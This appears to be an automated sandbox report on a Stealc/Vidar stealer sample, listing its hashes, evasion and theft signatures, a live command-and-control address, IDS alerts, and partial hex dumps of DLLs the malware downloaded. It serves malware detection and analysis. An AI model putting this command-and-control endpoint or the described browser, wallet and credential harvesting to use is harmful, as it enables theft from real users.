Windows Analysis Report
random(1).exe

Overview

General Information

Sample name: random(1).exe
Analysis ID: 1629904
MD5: 1e95dc10fef7079a5d3fa793732a7cce
SHA1: 8e9ccb511e76c921c6ddf2a2615a2e3c86ea4113
SHA256: 81ac77037e15e56a6cdc0ba7e2af38e3e5a9f7a353054276c763e57d03db5ec1
Tags: 185-215-113-209, exe, user-JAMESWT_MHT

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Credential Stealer

Classification

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that grabs information on 2FA software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: random(1).exe Avira: detected
Source: random(1).exe.7600.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "185.215.113.115/c4becf79229cb002.php", "Botnet": "reno"}
Source: random(1).exe ReversingLabs: Detection: 78%
Source: random(1).exe Virustotal: Detection: 77%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5EA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 0_2_6C5EA9A0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5E4440 PK11_PrivDecrypt, 0_2_6C5E4440
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5B4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 0_2_6C5B4420
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5E44C0 PK11_PubEncrypt, 0_2_6C5E44C0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C6325B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 0_2_6C6325B0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5EA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 0_2_6C5EA650
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5C8670 PK11_ExportEncryptedPrivKeyInfo, 0_2_6C5C8670
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5CE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 0_2_6C5CE6E0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C60A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 0_2_6C60A730
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C610180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util, 0_2_6C610180
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5E43B0 PK11_PubEncryptPKCS1,PR_SetError, 0_2_6C5E43B0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C607C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util, 0_2_6C607C00
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5C7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey, 0_2_6C5C7D60
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C60BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy, 0_2_6C60BD30
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C609EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo, 0_2_6C609EC0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5E3FF0 PK11_PrivDecryptPKCS1, 0_2_6C5E3FF0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5E3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError, 0_2_6C5E3850
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5E9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate, 0_2_6C5E9840
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C60DA40 SEC_PKCS7ContentIsEncrypted, 0_2_6C60DA40
Source: random(1).exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49835 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49841 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: random(1).exe, 00000000.00000002.2028941439.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: random(1).exe, 00000000.00000002.2028941439.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49733 -> 185.215.113.115:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49733 -> 185.215.113.115:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.115:80 -> 192.168.2.4:49733
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49733 -> 185.215.113.115:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.115:80 -> 192.168.2.4:49733
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49733 -> 185.215.113.115:80
Source: Malware configuration extractor URLs: 185.215.113.115/c4becf79229cb002.php
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 08:25:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 08:25:37 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 08:25:38 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 
73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 08:25:39 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 
